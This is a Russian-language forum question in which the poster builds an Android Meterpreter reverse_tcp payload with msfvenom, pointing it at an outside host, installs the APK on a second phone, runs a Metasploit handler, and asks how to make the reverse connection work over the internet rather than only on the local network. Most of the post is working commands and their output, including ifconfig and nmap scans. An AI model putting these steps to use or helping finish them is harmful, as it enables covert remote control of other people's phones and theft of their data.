Прежде всего, это мой первый пост, поэтому, пожалуйста, не игнорируйте это. Возможно, вы видели этот вопрос раньше. Прежде чем пометить это как дубликат, пожалуйста, поймите мои проблемы. У меня много вопросов. Я использую это в образовательных целях.
пожалуйста, обратите внимание на следующее:
- У меня нет роутера.
- Я установил Кали 2.0(сана).
- Я использую свой мобильный Android для подключения к Интернету через USB-модем.
Теперь я объясню, что сделано.
прежде всего я создал полезную нагрузку Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk
xxx.xxx.net - это мой не зарегистрированный ip-адрес (скрытый с x); тогда я успешно подписал его.
Теперь я отправил его на другое устройство Android через Bluetooth (поэтому IP-адрес моего устройства не изменился. Он также не подключен к локальной сети), тогда я успешно установил его.
Ifconfig:
# ifconfig
eth0 Link encap:Ethernet HWaddr 78:24:af:bc:a8:a2
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:1072 errors:0 dropped:0 overruns:0 frame:0
TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:87360 (85.3 KiB) TX bytes:87360 (85.3 KiB)
usb0 Link encap:Ethernet HWaddr 42:c8:eb:7b:43:a9
inet addr:192.168.42.50 Bcast:192.168.42.255 Mask:255.255.255.0
inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:20535 errors:21 dropped:0 overruns:0 frame:21
TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11073420 (10.5 MiB) TX bytes:3833297 (3.6 MiB)
Затем я открыл терминал.
# msfconsole
_____________
msf > use exploit/multi/handler
msf exploit(handler)
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 192.168.42.50
lhost => 192.168.42.50
msf exploit(handler)
set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.42.50:4444
[*] Starting the payload handler...
После того, как я открыл приложение на целевом мобильном устройстве, в терминале metasploit ничего не поступало.
Однако то же самое отлично работает по локальной сети. но когда дело доходит до интернета, это терпит неудачу. Я перепробовал почти все, что мог, но тщетно.
Я обнаружил, что порты открываются в локальном IP-адресе.
# nmap 192.168.42.50
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST
Nmap scan report for kali (192.168.42.50)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
4444/tcp open krb524
Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
но они закрыты в незарегистрированном DNS.
# nmap xxx.xxx.net
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST
Nmap scan report for xxx.xxx.net (a.b.c.d)
Host is up (0.22s latency).
rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
53/tcp filtered domain
80/tcp open http
111/tcp open rpcbind
443/tcp open https
445/tcp filtered microsoft-ds
554/tcp filtered rtsp
1723/tcp filtered pptp
3306/tcp open mysql
8022/tcp open oa-system
Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds
примечание: abcd - это разрешенный IP-адрес моего DNS
Так как именно я могу установить успешное соединение?
Если вы думаете, что этот вопрос не по теме или что-то еще, пожалуйста, предложите мне решение.